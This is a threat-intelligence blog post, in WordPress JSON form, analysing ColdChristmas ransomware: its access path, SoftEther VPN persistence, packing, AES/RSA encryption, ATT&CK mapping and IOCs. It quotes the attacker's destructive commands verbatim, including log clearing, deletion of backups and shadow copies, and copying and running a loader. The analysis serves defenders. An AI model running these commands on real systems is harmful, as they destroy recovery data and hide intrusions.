{"id":69,"date":"2021-12-23T07:25:19","date_gmt":"2021-12-23T07:25:19","guid":{"rendered":"https:\/\/blog.scilabs.mx\/en\/?p=69"},"modified":"2021-12-23T07:25:19","modified_gmt":"2021-12-23T07:25:19","slug":"coldchristmas-ransomware","status":"publish","type":"post","link":"https:\/\/blog.scilabs.mx\/en\/2021\/12\/23\/coldchristmas-ransomware\/","title":{"rendered":"ColdChristmas – Ransomware"},"content":{"rendered":"

\"Coldchristmas<\/p>\n

Overview<\/strong><\/p>\n

The following post describes the identified TTPs and IOCs of new ransomware observed by SCILabs in Mexico called ColdChristmas, which our team has recently monitored. The cyberweapons used in the attack aim to steal the victim’s information through SoftEther’s VPN and encrypt it using various asymmetric encryption techniques and libraries of Golang<\/em>. It is important to mention that when SCILabs detected this threat \u201cin the wild\u201d<\/em>, antivirus solutions did not detect it as a malicious artifact and our cyber ecosystem had also not seen the threat before. <\/strong><\/p>\n

Based on other campaigns we have analyzed, SCILabs considers that the cybercriminals use compromised passwords (possibly from services like VPN, RDP, or Active Directory) as an initial vector of access with a medium level of confidence. This post will show the analysis of each element used in the attack according to data recovered from SCILabs telemetry. From the research we carried out in different sources to which SCILabs has access, we did not observe that the operators of this ransomware had leak sites or made a public misuse of the allegedly stolen information.<\/p>\n

Analysis<\/strong><\/p>\n

Threat context<\/strong><\/p>\n

SCILabs identified that once the attacker compromised a server accessible from the internet (which had HTTP, HTTPS and RDP services exposed), the cybercriminal performes a lateral movement to one of the domain controllers and obtaines an account with system privileges. From that computer, he distributes the ransomware using PowerShell and the PsExec tool from Sysinternals<\/em> with the credentials of a highly privileged user and used SoftEther VPN software to maintain access.<\/strong><\/p>\n

Below is an overview of this ransomware:<\/strong><\/p>\n

\"\"<\/p>\n

Attack Flow<\/strong><\/p>\n

\"\"
Figure 1 Attack flow<\/figcaption><\/figure>\n

Techniques used by the artifact <\/strong><\/h2>\n

\u00a0<\/strong><\/p>\n

The following are some of the techniques used by the attacker to remove his tracks and distribute the encryption artifact:<\/strong><\/p>\n

 <\/p>\n\n\n\n
\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/c wevtutil cl “windows powershell”<\/strong><\/p>\n

Deletes PowerShell logs with the use of Microsoft’s wevtutil tool<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/c wevtutil cl system <\/strong><\/p>\n

Eliminates system logs with the use of Microsoft’s wevtutil tool<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 wevtutil cl security <\/strong><\/p>\n

Eliminates security logs with the use of Microsoft’s wevtutil tool<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/c wevtutil cl Application <\/strong><\/p>\n

Eliminates application logs with the use of Microsoft’s wevtutil tool<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest <\/strong><\/p>\n

Eliminates system state backups by prioritizing oldest copies<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/C wbadmin DELETE SYSTEMSTATEBACKUP <\/strong><\/p>\n

Eliminates system state backups<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/c del \/a \/s \/q \/f C:\\Windows\\system32\\config\\*log <\/strong><\/p>\n

Forces deletion of log files in C:\\Windows\\system32\\config\\<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/C bcdedit \/set {default} bootstatuspolicy ignoreallfailures <\/strong><\/p>\n

Disables the Windows error recovery option from operating system startup<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/C chcp 65001 & ping 8.8.8.8 <\/strong><\/p>\n

This command sets the number of the active code table in UTF-8 (65001). In some cases, this command is used to identify the language of the operating system of the computer to infect and sends a ping to Google DNS 8.8.8.8<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/C wmic shadowcopy delete \/nointeractive <\/strong><\/p>\n

Deletes shadow copies from the computer (a shadow copy is a backup of computer files or volumes that are made even when the file is in use)<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/C taskkill \/f \/im PsEfAzM7.zip & echo fuckyou > C:\\WINDOWS\\TEMP\\6K9E9Krb\\PsEfAzM7.zip & del \/f \/q C:\\WINDOWS\\TEMP\\6K9E9Krb\\PsEfAzM7.zip <\/strong><\/p>\n

Forces the stop of the process named PsEfAzM7.zip and force its removal<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 taskkill \/f \/im PsEfAzM7.zip <\/strong><\/p>\n

Forces the stop of the PsEfAzM7.zip process (invalid)<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 C:\\Windows\\system32\\cmd.exe \/c copy \\\\192.x.y.z\\SYSVOL2\\domain\\loader.exe C:\\Users\\Public\\loader.exe \/y && C:\\Users\\Public\\loader.exe <\/strong><\/p>\n

Copies the file loader.exe from the 192.x.y.z computer to the public folder of another without requesting interaction.<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1 <\/strong><\/p>\n

If there is no session attached to the physical console (for example, if the physical console session is in the process of connecting or disconnecting), this function returns 0xFFFFFFFF “.<\/p>\n

 <\/p>\n

\u00b7\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 cmd.exe \/C taskkill \/f \/im loader.exe & echo fuckyou > C:\\Users\\Public\\loader.exe & del \/f \/q C:\\Users\\Public\\loader.exe <\/strong><\/p>\n

Forces stop of the process named loader.exe and forces its removal (the file could not be recovered through forensic methods).<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

 <\/p>\n

Malware analysis<\/strong><\/h2>\n

\u00a0<\/strong>The sample is programmed in GOlang for 64-bit architecture and is not digitally signed.<\/strong><\/p>\n

\"\"
Figure 2 File PE information<\/figcaption><\/figure>\n

SCILabs analyzed the structure of the file and observed that the executable is packaged. The following image shows the high average entropy of the file, which is 6.66807.<\/strong><\/p>\n

\"\"
Figure 3 Artifact entropy<\/figcaption><\/figure>\n

By analyzing the import table, SCILabs identified that the malware only loads the kernel32.dll <\/strong>release, confirming that the malware is packaged.<\/p>\n

\"\"
Figure 4 Import table before unpacking<\/figcaption><\/figure>\n

Artifact operation flow diagram<\/strong><\/p>\n

\"\"
Figure 5 Artifact operation flow diagram<\/figcaption><\/figure>\n

The following is the public key extracted from the ransomware.<\/strong><\/p>\n

\"\"
Figure 6 Public key<\/figcaption><\/figure>\n

The ransom note is shown below, which is very similar to the one used by the \u201cHowareyou<\/em>\u201d ransomware family:<\/strong><\/p>\n

\"\"
Figure 7 Ransom note generated by the artifact<\/figcaption><\/figure>\n

However, SCILabs analyzed different samples to determine if it is a new variant of some ransomware or a new artifact, showing that the malware is quite different from the \u201cHowareyou<\/em>\u201d family.<\/strong><\/p>\n

\"\"<\/p>\n

The behavior comparison and code analysis result shows that it is new ransomware with new and better capabilities.<\/strong><\/p>\n

Technical Summary<\/strong><\/h2>\n
    \n
  • It is presumed the attacker gets access using compromised credentials in an exposed server with elevated privileges and then dumped admin credentials to move laterally to different servers until he gets to the domain controller.<\/strong><\/li>\n<\/ul>\n
      \n
    • Once the threat actor has access to the domain controller, he uses a PowerShell script to distribute the ransomware.<\/strong><\/li>\n<\/ul>\n
        \n
      • The attacker establishes persistence using SoftEther, a VPN program rarely used in other compromises, which works similarly to programs like TeamViewer and can be considered a legitimate application. The application does not appear as installed, but the service is active, so it is not easy to determine that it is in the system by software inventory.<\/strong><\/li>\n<\/ul>\n
          \n
        • The attacker also disguises the attack as to look like it is performed by a Russian threat actor, including intentionally Russian language comments and commands.<\/strong><\/li>\n<\/ul>\n
            \n
          • According to the visibility of SCILabs, no such ransomware attacks had been previously identified in the region using similar methods for persistence using SoftEther VPN software.<\/strong><\/li>\n<\/ul>\n
              \n
            • The ransomware is packed and has anti-debugging capabilities, virtual environment detection, and anti-sandbox functions as a protection method. Because of the way it behaves, no antivirus solutions detected it when deploying.<\/strong><\/li>\n<\/ul>\n
                \n
              • The file with the encryption capabilities is named randomly by the attacker.<\/strong><\/li>\n<\/ul>\n
                  \n
                • The file has encryption capabilities using AES-128 and RSA-2048 algorithms, generation of the ransom note and directory listing, SCILabs did not find connections to command-and-control sites, exploitation of vulnerabilities, loading or generation of shellcodes.<\/strong><\/li>\n<\/ul>\n
                    \n
                  • The attacker employs several anti-forensic techniques to delete traces of its activities and tools used during the attacks, ensuring that all system and security logs are encrypted in all servers when performing any task.<\/strong><\/li>\n<\/ul>\n

                    TTPs observed aligned to MITRE\u2019s ATT&CK framework.<\/strong><\/p>\n

                     <\/p>\n\n\n\n\n\n\n\n\n
                    Execution<\/strong><\/td>\nPrivilege Escalation<\/strong><\/td>\nDefense Evasion<\/strong><\/td>\nDiscovery<\/strong><\/td>\nLateral Movement<\/strong><\/td>\nImpact<\/strong><\/td>\n<\/tr>\n
                    T1059.001<\/p>\n

                    Command and Scripting Interpreter: PowerShell<\/td>\n

                    		T1078<\/p>\n

                    Valid Accounts<\/td>\n

                    		T1070.004<\/p>\n

                    Indicator Removal on Host: File Deletion<\/td>\n

                    		T1083<\/p>\n

                    File and Directory Discovery<\/td>\n

                    		T1570<\/p>\n

                    Lateral Tool Transfer<\/td>\n

                    		T1490<\/p>\n

                    Inhibit System Recovery<\/td>\n<\/tr>\n

                    <\/td>\n<\/td>\nT1070.001<\/p>\n

                    Indicator Removal on Host: Clear Windows Event Logs<\/td>\n

                    		<\/td>\n<\/td>\nT1486<\/p>\n

                    Data Encrypted for Impact<\/td>\n<\/tr>\n

                    <\/td>\n<\/td>\nT1070.003<\/p>\n

                    Indicator Removal on Host: Clear Command History<\/td>\n

                    		<\/td>\n<\/td>\n<\/td>\n<\/tr>\n
                    <\/td>\n<\/td>\nT1497 Virtualization\/Sandbox Evasion<\/p>\n

                     <\/td>\n

                    		<\/td>\n<\/td>\n<\/td>\n<\/tr>\n
                    <\/td>\n<\/td>\nT1070.004<\/p>\n

                    Indicator Removal on Host: File Deletion<\/td>\n

                    		<\/td>\n<\/td>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

                     <\/p>\n

                    Assessment<\/strong><\/p>\n

                    Based on the analysis of the attack, SCILabs can assess with high confidence the following:<\/strong><\/p>\n

                      \n
                    • The attacker can look for more victims in the region by taking advantage of the lack of good security practices in exposed servers.<\/strong><\/li>\n<\/ul>\n
                        \n
                      • SoftEther can result in a convenient persistence method because it is considered a legitimate application and would not be detected as malicious by AV or EDR solutions.<\/strong><\/li>\n<\/ul>\n
                          \n
                        • Since Tsukuba University designed SoftEther, the university’s infrastructure provides a layer of anonymity and ease of use for the attackers.<\/strong><\/li>\n<\/ul>\n
                            \n
                          • The ease of use of SoftEther and its lack of popularity can increase its use for persistence in different kinds of attacks.<\/strong><\/li>\n<\/ul>\n
                              \n
                            • Because this ransomware is a new variant and the cybercriminal behind it is unknown, the impact is likely high in organizations that only have antivirus solutions as a detection method.<\/strong><\/li>\n<\/ul>\n

                              IoC\u00b4s<\/h2>\n

                              \u00a0<\/strong>23RTW5UY[@]COCK[.]LI<\/strong><\/p>\n

                              F466B4620D87D68C30BB717C782FB8B9179A1FAC8C1A1A1513B26A5A5D2341E6<\/p>\n

                              DF0A2EDBC44B435A617EE38775D0B33DAD62EABA6D3953482DE5DCE547F5A770<\/p>\n

                              DC07EAC039E04F86E892D725F07B66A557D818F153EE7E7B5A3887503FE52458<\/p>\n

                              \u00a0<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"

                              Overview The following post describes the identified TTPs and IOCs of new ransomware observed by SCILabs in Mexico called ColdChristmas,<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-69","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/posts\/69","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/comments?post=69"}],"version-history":[{"count":0,"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/posts\/69\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/media?parent=69"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/categories?post=69"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.scilabs.mx\/en\/wp-json\/wp\/v2\/tags?post=69"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}